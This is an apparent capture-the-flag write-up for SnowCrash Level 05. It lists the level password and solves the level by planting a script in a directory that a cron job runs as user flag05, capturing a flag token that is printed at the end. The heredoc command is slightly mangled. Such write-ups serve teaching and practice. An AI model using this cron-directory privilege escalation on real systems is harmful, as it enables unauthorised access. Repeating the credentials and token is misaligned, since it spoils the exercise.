# Level 05 ## how to login username: level05 password: ne2searoevaevoem4ov4ar8ap ## Goal run `getflag` as user `flag05` ## Actually doing something ```bash level05@snowcrash.local.maix.me's password: You have new mail. level05@SnowCrash:~$ ``` This is weird, the only mail I have is my chain mail ! Jokes aside, looking at the files in the user's home, there is nothing other than the default ones. This reeks of old program though. Nobody check mails directly when they login like this. From my times on wikipedia *not working* I know that `/var/mail` sometimes exists, lets check it ```bash level05@SnowCrash:~$ ll /var/mail/level05 -rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05 level05@SnowCrash:~$ cat /var/mail/level05 */2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05 ``` Oh wow, this looks like a nice cronjob if we decipher the old text, we get something like this: > Every two minutes (0, 2, 4, etc...) run the command `su -c "sh /usr/sbin/openarenaserver" - flag05` so `su -c "text"` means "please run `text` as X" and the `- flag05` means "use as `flag05` and not `root` as your user" so this runs `/usr/sbin/openarenaserver` every two minutes as the user `flag05` lets read that script ```bash level05@SnowCrash:~$ cat /usr/sbin/openarenaserver #!/bin/sh for i in /opt/openarenaserver/* ; do (ulimit -t 5; bash -x "$i") rm -f "$i" done ``` It looks like it runs the files present in `/opt/openarenaserver` with a limit of 5s (cpu time) per process, and then remove that file lets try to add a little script there (like say something that dumps the output of `getflag` to elsewhere?) ```bash ``level05@SnowCrash:~$ cat </tmp/getflag05 > #!/bin/sh > getflag >/tmp/flag05 > chmod +r /tmp/flag05 > EOF level05@SnowCrash:~$ chmod a+rx /tmp/getflag05 level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05 Check flag.Here is your token : viuaaale9huek52boumoomioc ``` And voila ! We had to write the result to another file since otherwise the data would be lost to the ether (crontab stdio)